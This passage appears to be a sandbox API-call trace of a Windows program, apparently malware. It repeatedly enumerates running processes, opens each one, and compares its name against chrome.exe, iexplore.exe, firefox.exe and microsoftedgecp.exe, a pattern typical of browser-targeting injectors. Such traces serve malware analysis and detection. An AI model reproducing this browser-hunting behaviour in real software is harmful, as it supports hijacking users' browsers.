	[0233.369] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0233.370] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x706c
	[0233.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.370] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0233.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.370] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.370] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0233.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.371] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.371] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0233.372] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x7070
	[0233.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.372] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.372] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.372] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.373] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.373] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.374] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x7074
	[0233.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.374] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.374] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.374] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.375] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.375] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.376] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x7078
	[0233.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.376] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.376] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.377] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.377] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.378] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0233.378] CloseHandle (hObject=0x4fd0) returned 1
	[0233.378] Sleep (dwMilliseconds=0x64) 
	[0233.487] GetCurrentProcessId () returned 0x110
	[0233.487] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0233.491] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0233.493] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0233.494] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0233.495] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x707c
	[0233.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.495] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0233.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.495] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.496] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0233.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.496] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.496] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0233.497] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x7080
	[0233.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.498] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0233.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.498] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.498] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0233.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.499] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.499] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0233.500] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x7084
	[0233.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.500] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0233.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.500] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.501] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0233.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.502] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.502] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0233.503] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x7088
	[0233.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.503] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0233.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.504] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.504] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0233.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.504] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.505] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0233.506] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x708c
	[0233.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.506] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0233.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.507] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.507] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0233.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.508] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.508] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0233.509] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x7090
	[0233.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.509] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0233.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.509] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.510] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0233.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.510] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.510] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0233.511] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x7094
	[0233.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.511] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0233.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.511] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.512] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0233.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.512] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.512] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0233.513] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x7098
	[0233.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.513] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0233.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.513] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.513] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0233.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.514] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.514] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.515] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x709c
	[0233.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.515] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.515] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.515] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.516] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.516] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.517] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x70a0
	[0233.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.517] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.518] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.518] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.518] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.519] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.519] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x70a4
	[0233.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.519] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.520] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.520] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.521] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.521] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.522] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x70a8
	[0233.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.522] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.523] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.523] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.524] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.524] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.525] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x70ac
	[0233.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.525] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.525] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.525] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.526] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.526] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.527] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x70b0
	[0233.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.527] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.527] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.527] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.528] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.528] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.529] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x70b4
	[0233.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.529] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.529] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.530] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.530] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.530] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0233.531] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x70b8
	[0233.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.531] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0233.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.531] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.532] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0233.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.532] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.532] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.533] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x70bc
	[0233.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.534] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.534] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.534] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.535] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.535] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0233.535] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x70c0
	[0233.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.536] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.536] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.536] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.537] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.537] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0233.538] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x70c4
	[0233.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.538] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0233.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.538] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.538] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0233.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.539] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.539] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.539] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x70c8
	[0233.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.540] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.540] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.540] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
